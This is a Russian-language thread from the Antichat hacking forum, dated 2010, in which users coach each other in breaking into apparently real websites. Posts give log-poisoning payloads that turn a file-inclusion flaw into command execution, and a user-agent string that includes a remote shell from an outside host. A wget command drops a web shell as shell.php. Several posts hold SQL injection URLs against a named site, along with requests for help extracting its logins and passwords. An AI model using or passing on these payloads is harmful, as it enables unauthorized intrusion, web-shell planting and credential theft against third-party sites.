Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.01.2010, 23:41
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465
Репутация:
0
|
|
HAXTA4OK - Вот что значит мастер!Спасибо,я целый день мучаюсь)
|
|
|
30.01.2010, 23:49
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
у меня такая проблема...
есть lfi, на сайте стоит freebsd...
найшол по конфигу путь к логам:
/var/log/httpd-access.log
/var/log/httpd-error.log
как дальше правильно в них проинклудить шелл?
|
|
|
|
30.01.2010, 23:54
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от 547
у меня такая проблема...
есть lfi, на сайте стоит freebsd...
найшол по конфигу путь к логам:
/var/log/httpd-access.log
/var/log/httpd-error.log
как дальше правильно в них проинклудить шелл?
Код:
http://site.ru/?<?php system('ls');exit; ?>&cmd=ls
Потом инклудь логи...
|
|
|
|
31.01.2010, 00:03
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от mailbrush
Код:
http://site.ru/?<?php system('ls');exit; ?>&cmd=ls
Потом инклудь логи... ну там еще можно в юзер агент впихнуть типа
<?php include('http://supervasyahacker.com/supershell.txt'); ?>
но тут еще одна проблемка логи ведутся там с 2006 года и грузятся туеву хучу времени...
|
|
|
|
31.01.2010, 00:10
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от 547
ну там еще можно в юзер агент впихнуть типа
<?php include('http://supervasyahacker.com/supershell.txt'); ?>
но тут еще одна проблемка логи ведутся там с 2006 года и грузятся туеву хучу времени...
Я привел пример. Ну вот и жди это туеву хучу времени, иначе - никак.
|
|
|
|
31.01.2010, 00:15
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от mailbrush
Я привел пример. Ну вот и жди это туеву хучу времени, иначе - никак.
вообщем присмотрелся я к логам и там вообще кроме 2006 года нету записей...
сложилось такое впечатление что сам файл присутствует, читать его можно но запись в него больше неведется 
может ли такое быть?...
|
|
|
|
31.01.2010, 00:23
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от 547
вообщем присмотрелся я к логам и там вообще кроме 2006 года нету записей...
сложилось такое впечатление что сам файл присутствует, читать его можно но запись в него больше неведется
может ли такое быть?...
1. Да, может.
2. Вызываемые ресурсы могут быть ограничены.
3. Может у тебя не LFI, не в тот лог пишешь, какая-то фильтрация.
4. Вообще как бы скрипт выполняется при загрузке сразу же! Т.е. если знать сразу пути и права, то выполнив system(cd /home/777; wget http://shellsite.com/shell.txt -O shell.php); то можно не ждать конца загрузки логов.
|
|
|
|
31.01.2010, 00:24
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465
Репутация:
0
|
|
Сообщение от HAXTA4OK
http://www.ollis.ru/index.php?id=cabinet')+order+by+7%23&type=cabinet& action=lost_pw&mode=return_from_hidden
http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Sele ct+Name_Const(version(),1),Name_Const(version(),1) )a)%23&type=cabinet&action=lost_pw&mode=return_fro m_hidden
И напоследок,как вытащить логины да пароли?)Ради чего и задавал вопрос.Самому не получается.
|
|
|
|
31.01.2010, 00:29
|
|
Новичок
Регистрация: 02.01.2010
Сообщений: 2
Провел на форуме:
26271
Репутация:
0
|
|
Народ подскажите. Есть сайт, есть sql-injection при таком запросе
-11+UNION+SELECT+1,2,3,4,5,6/* выводит числа 3 и 6 когда подставляю строковые данные ну например version() или любое другое слово выбивает ошибку подскажите что можно сделать с таким сайтом
|
|
|
|
31.01.2010, 00:33
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от emirate
Народ подскажите. Есть сайт, есть sql-injection при таком запросе
-11+UNION+SELECT+1,2,3,4,5,6/* выводит числа 3 и 6 когда подставляю строковые данные ну например version() или любое другое слово выбивает ошибку подскажите что можно сделать с таким сайтом
омг, какой раз уже писалось =\
unhex(hex(version()))
_http://forum.antichat.ru/thread104591.html , см Вопрос №2
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1865463){kind=avatar}
Похожие темы
Линейный вид
